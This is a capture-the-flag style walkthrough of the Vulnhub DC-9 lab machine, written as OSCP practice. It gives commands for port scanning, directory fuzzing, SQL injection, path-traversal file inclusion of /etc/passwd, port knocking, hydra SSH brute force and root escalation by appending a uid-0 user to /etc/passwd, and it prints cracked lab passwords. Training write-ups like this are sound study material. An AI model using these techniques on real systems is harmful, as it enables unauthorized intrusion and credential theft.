DC-9 Walkthrough (Vulnhub)
Intro:
This VM is part of the TJ_Null list to prepare for the OSCP, you can download it here.
Nb: A good way of learning is to solve these problems your self and see how did others solve them
Start by downloading the VM and make sure it is under the same network as your kali machine and let’s get started!
Scanning:
looking for the IP address
netdiscoverlooking for open ports (without details)
export IP=YOUR_IP_ADDRESS
nmap -p- -A $IP
Enum:
Ps: always choose http over ssh
export URL=http://$IP
nikto -h $URL -C all
Don’t forget to note your findings
next, we need to fuzz for files and directories
export FUZZ=$URL/FUZZ
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt - hc 404 $FUZZ
export FUZZ=$URL/FUZZ/
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt - hc 404 $FUZZ
next, let’s try manual discovery/fuzzing
add the IP to /etc/hosts file
/search.php is vulnerable to SQLi
Exploitation:
We will use 2 methods to perform SQL injection
1. Automatic: using SQLMap (not allowed in the OSCP exam)
2. Manual Testing
We performed both of them in this medium post
> We found some hashes and users passwords
Crack the admin hash at hashes.com
mysql credentials: admin | transorbital1
Once logged in this error message appears
The page is parsing for a file, so let’s try including a file path in the URL with some parameters
>>> it worked !!!
to be sure
export URL=http://192.168.204.143/welcome.php?FUZZ=../../../../../etc/passwd
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt — hc 404,302 — hh 963 -b “PHPSESSID=5btif1i2v7p0u6uho4ocu3kko0” $URL
we have directory traversal !!!
Trying RFI
Trying LFI
it hanged loading >>> LFI
what didn’t work:
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/www/html/index.php
/home/USER/.ssh/id_rsa
http://url/welcome.php?file=../../../../../../etc/knockd.conf
revealed SSH information
Let’s try Port Knocking attack since we have openSSH sequence
for X in 4000 5000 6000; do nmap -Pn — host-timeout 201 — max-retries 0 -p $X $IP; done
Replace with the OPEN sequence
for X in 7469 8475 9842 ; do nmap -Pn — host-timeout 201 — max-retries 0 -p $X $IP; done
ssh is now open !!!
Launch hydra using the user and pass files from earlier
login suing ssh
sudo -l didn’t reveal anything on the 3 users
we found another password file inside janitor’s home directory
add it to the pass file and re-launch hydra
B4-Tru3–001
sudo -l on fredf
what is it
since the allowed script can read and append, we can append a user to /etc/passwd
so let’s create a password using openSSL
in this format
USER:PASSWORD:0:0:USER:/home/USER:/bin/bash
paste it to file in the user directory
it has been added to /etc/passwd, and now we’re root
I Hope this has been fun, to next time
